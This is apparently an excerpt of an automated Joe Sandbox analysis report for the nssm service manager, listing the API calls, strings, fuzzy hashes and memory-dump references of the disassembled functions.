                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD219C3460478592FB12DB57B4403EAA3A0A78C7E8F40422AFB99477F6DB3DC955C701
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1012874770-0
                                                                                                                                                                                                                                  • Opcode ID: a33163bb78a856138fd07593b250b41af7d7479368abdc485aebd4cfc646916c
                                                                                                                                                                                                                                  • Instruction ID: b20bbcfc7a40dd8dc1c85e147d0aa11beb43cde581587778187654aba4ef19b1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a33163bb78a856138fd07593b250b41af7d7479368abdc485aebd4cfc646916c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5741E13260668485EF679F63C4953E823A1EB8DBD4F084535BF094F6A6CF7AC9A1C350
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(?,?,?,?,?,?,00000008,000000014001F5BE), ref: 000000014001F34C
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00000008,000000014001F5BE), ref: 000000014001F35E
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000008,000000014001F5BE), ref: 000000014001F3BE
                                                                                                                                                                                                                                  • malloc.LIBCMT ref: 000000014001F42A
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000008,000000014001F5BE), ref: 000000014001F474
                                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(?,?,?,?,?,?,00000008,000000014001F5BE), ref: 000000014001F48B
                                                                                                                                                                                                                                  • free.LIBCMT ref: 000000014001F49C
                                                                                                                                                                                                                                  • GetStringTypeA.KERNEL32(?,?,?,?,?,?,00000008,000000014001F5BE), ref: 000000014001F519
                                                                                                                                                                                                                                  • free.LIBCMT ref: 000000014001F529
                                                                                                                                                                                                                                    • Part of subcall function 000000014002097C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00000001400209D2
                                                                                                                                                                                                                                    • Part of subcall function 000000014002097C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00000001400209F1
                                                                                                                                                                                                                                    • Part of subcall function 000000014002097C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 0000000140020AF5
                                                                                                                                                                                                                                    • Part of subcall function 000000014002097C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 0000000140020B30
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$StringType$Infofree$ErrorLastmalloc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3804003340-0
                                                                                                                                                                                                                                  • Opcode ID: 32c6e6434eedd686598bfeff8417f297f3a50ef43c79cc93c7994628239fe017
                                                                                                                                                                                                                                  • Instruction ID: 16df69f81f2f266680c3105bc2cebaf564f3f77a721ef0802e0cf1696fcf0f4e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32c6e6434eedd686598bfeff8417f297f3a50ef43c79cc93c7994628239fe017
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A661A13220068087EB629F67E4407E977A5F74CBE8F580619FF195BBE9CB75C8419340
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Event$ProcessSourceTime$CloseCodeDeregisterErrorExitFileHandleLastRegisterReportSleepSystemTimes_snwprintf_s
                                                                                                                                                                                                                                  • String ID: %lu
                                                                                                                                                                                                                                  • API String ID: 1543897287-685833217
                                                                                                                                                                                                                                  • Opcode ID: 1908a710bad3eaee26f708641d8ee29770bf3899910ecc8c79914aa23e7d2497
                                                                                                                                                                                                                                  • Instruction ID: b0ecf26c5d6f531ac1d82f716e0d9476cb715f0132e6f461eb753316333feec2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1908a710bad3eaee26f708641d8ee29770bf3899910ecc8c79914aa23e7d2497
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B91AD72604B8581E721DB22F4417DB73A4F789B88F540126FB8D0B7A9CF3AC949CB50
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: EnvironmentVariable$Heap$FreeProcess
                                                                                                                                                                                                                                  • String ID: =$=
                                                                                                                                                                                                                                  • API String ID: 3778319993-2054292070
                                                                                                                                                                                                                                  • Opcode ID: 390f064918eca7fa7cc1e6b9cfa2e11e3f902bdc85e2e21537593c639a4ee096
                                                                                                                                                                                                                                  • Instruction ID: f4e3a3309aa16cf9671c2fc93041f76dcac6b04cbbdec9eb8608659c997fa149
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 390f064918eca7fa7cc1e6b9cfa2e11e3f902bdc85e2e21537593c639a4ee096
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB214476B0454091EB67AF33B8143AAA3F2F749BC8F1C9016EB45576B5EB78C8858341
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseQueryValue_snwprintf_s
                                                                                                                                                                                                                                  • String ID: %lu$AppExit
                                                                                                                                                                                                                                  • API String ID: 2908501905-2506947422
                                                                                                                                                                                                                                  • Opcode ID: 498884906e5d91b8392860f8edc8096894775b1500c554e6acfc866898c3424a
                                                                                                                                                                                                                                  • Instruction ID: 4fe3509dac396d1ed14259e7703fc005311a71b119cbabc83998e2f6f3efbf60
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 498884906e5d91b8392860f8edc8096894775b1500c554e6acfc866898c3424a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD218072619B8986EB52CB62B8407DA63A1FB4DBE4F545225FF4D477A5EF38C404CB00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _errno
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2918714741-0
                                                                                                                                                                                                                                  • Opcode ID: bb53a71513638528cddcf830d7d0ecdc7f53e067d4f1d03e076eb0cda10a80f7
                                                                                                                                                                                                                                  • Instruction ID: 4bdbec914e753a8d984ba9e49abbdc3970e928863650204d95dacaae493231b8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb53a71513638528cddcf830d7d0ecdc7f53e067d4f1d03e076eb0cda10a80f7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2318B36544B4085EA22AB66A444BDE72A0E79D7E8F604301FB690B7F5CA7AC481C711
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __doserrno_errno
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 921712934-0
                                                                                                                                                                                                                                  • Opcode ID: 03e029cb8c3594ac44fbbd77b1ac742dd02e7575c3c07ea29c2bd1dc52ac6700
                                                                                                                                                                                                                                  • Instruction ID: aab86f5e4076dff669af7bde9e61bd2dabace6dc5e03dd5aeea5fb8436d3782b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 03e029cb8c3594ac44fbbd77b1ac742dd02e7575c3c07ea29c2bd1dc52ac6700
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E31AC3261029042E7176FABA88179D3651A78ABF0FA54315BF390FBF2CE7E84028700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __doserrno_errno
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 921712934-0
                                                                                                                                                                                                                                  • Opcode ID: ec2200209c736f030afa711eceed5235f36187470ec9e35d79a54a5429fcd67b
                                                                                                                                                                                                                                  • Instruction ID: dae1da17fde95d810361000364b8e0f3f37ef0bbac3dd392eca02a654e07a291
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec2200209c736f030afa711eceed5235f36187470ec9e35d79a54a5429fcd67b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D31D43260075486F317AF6B98817DE7650BBCA7A0F954319FB250B6E3CA7DC8018700
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: SERVICE_FILE_SYSTEM_DRIVER$SERVICE_INTERACTIVE_PROCESS$SERVICE_KERNEL_DRIVER$SERVICE_WIN32_OWN_PROCESS$SERVICE_WIN32_SHARE_PROCESS$SERVICE_WIN32_SHARE_PROCESS|SERVICE_INTERACTIVE_PROCESS
                                                                                                                                                                                                                                  • API String ID: 0-2402770260
                                                                                                                                                                                                                                  • Opcode ID: 3f6cfd4589b565fb45b1e8a5334c3b041cbb8dcf3c65b872394638a2fe574967
                                                                                                                                                                                                                                  • Instruction ID: dd01143f1ec15247a0ad43739e7b3c9b16e6013326adf312d155658537d4e12f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f6cfd4589b565fb45b1e8a5334c3b041cbb8dcf3c65b872394638a2fe574967
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9221C371524690C2F7679BB7B8443E962A5A71C7D0F941106FB0A0B7F4CB39DD988640
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$ProcessWcsftime$AddressAllocErrorFreeLastProc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1454350403-0
                                                                                                                                                                                                                                  • Opcode ID: 284ed1cabcbc0382592f37b99af1f2e1b969f91151de9780f39a67cf4dee364b
                                                                                                                                                                                                                                  • Instruction ID: 2acd19bc24c859cc905b93041a5748de2cb245c92ba42ffc15dad2915385b85c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 284ed1cabcbc0382592f37b99af1f2e1b969f91151de9780f39a67cf4dee364b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5213E76204B8182EA11DB96B41439AA3A1FB8DBE4F584628FFAD077E5DF3CC5458700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _errno
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2918714741-0
                                                                                                                                                                                                                                  • Opcode ID: ce30b3696d79ad48413547d8b6020e5f0fa1dbf650c0f2a64b51332e4a7266d8
                                                                                                                                                                                                                                  • Instruction ID: 52518603c5ef8fb18ef12386852b9e7d683f52cc0f218be4ca38bf51e10acd94
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce30b3696d79ad48413547d8b6020e5f0fa1dbf650c0f2a64b51332e4a7266d8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0451E73220468085E7628F26D440BAD7BB1F789BE4F588315FB6E1B7F4CB3AC5418702
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _errno
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2918714741-0
                                                                                                                                                                                                                                  • Opcode ID: e0cce2f5b3f07d73c2a9057c484838ca7ede734678a38ef4d1694be825800498
                                                                                                                                                                                                                                  • Instruction ID: c8b684b38056980332df1693a4e0bb996f1e4871c07e2c7c5c51cd5273dc4fd6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e0cce2f5b3f07d73c2a9057c484838ca7ede734678a38ef4d1694be825800498
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C531A231B1068046F7176F7B98957EE3651ABA97E4F944329BB220F2F2CF7E88418714
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _FF_MSGBANNER.LIBCMT ref: 000000014001921F
                                                                                                                                                                                                                                    • Part of subcall function 000000014001C7E8: GetModuleFileNameA.KERNEL32(?,?,?,?,?,000000014001CA44,?,?,?,?,000000014001DA49,?,?,00000000,0000000140018CC8), ref: 000000014001C8AB
                                                                                                                                                                                                                                    • Part of subcall function 00000001400180A8: ExitProcess.KERNEL32 ref: 00000001400180B7
                                                                                                                                                                                                                                    • Part of subcall function 0000000140018CA4: malloc.LIBCMT ref: 0000000140018CC3
                                                                                                                                                                                                                                    • Part of subcall function 0000000140018CA4: Sleep.KERNEL32(?,?,00000000,0000000140019259,?,?,00000000,0000000140019303,?,?,?,?,?,?,00000000,000000014001AFD8), ref: 0000000140018CDA
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0000000140019261
                                                                                                                                                                                                                                  • _lock.LIBCMT ref: 0000000140019275
                                                                                                                                                                                                                                  • free.LIBCMT ref: 0000000140019297
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 000000014001929C
                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000,0000000140019303,?,?,?,?,?,?,00000000,000000014001AFD8,?,?,00000000,000000014001A221), ref: 00000001400192C2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _errno$CriticalExitFileLeaveModuleNameProcessSectionSleep_lockfreemalloc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1024173049-0
                                                                                                                                                                                                                                  • Opcode ID: 9778fb8cdee51a74a4c3b59c911fa3ce1d42e9569158680db60c445a41b96d73
                                                                                                                                                                                                                                  • Instruction ID: 8fd46229dbe7164fd2dc0cbb7fc5ef7116e4cf367b45facbf63e70500b10d97c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9778fb8cdee51a74a4c3b59c911fa3ce1d42e9569158680db60c445a41b96d73
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E0218C3165164092F667AB93A8443ED7294FB8D7C0F444524FB464F7EACF7EC8408340
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$Process$AllocFree_snwprintf_s
                                                                                                                                                                                                                                  • String ID: value_from_string()
                                                                                                                                                                                                                                  • API String ID: 734457407-962593079
                                                                                                                                                                                                                                  • Opcode ID: 56ee81e3aae9f956b827a0899544db39940f799f3c787ff45c7486f726ecc9f2
                                                                                                                                                                                                                                  • Instruction ID: 93b2a03c7317a1d8106fa5bca8a24d3af9207cd828f7fb9954d571662392c6e6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56ee81e3aae9f956b827a0899544db39940f799f3c787ff45c7486f726ecc9f2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9213635605B8095E711AFA6A84039AB3A4F789BF4F944B29FFA9477F5DF39C4818300
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Item$EnableWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1115945535-0
                                                                                                                                                                                                                                  • Opcode ID: 5adf99daa5e3a9828f665db5c1e1c082a8841737f47ce2857ec09e57c2817024
                                                                                                                                                                                                                                  • Instruction ID: 22f277d49f4cbc6036d30b2c23ef0b11e5add6d33fb94fcd8c434948859a6106
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5adf99daa5e3a9828f665db5c1e1c082a8841737f47ce2857ec09e57c2817024
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4501FB3A701A4093EA16AF93E8583956361B7CDBD5F204839EF4A43334CE3CCC49C210
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
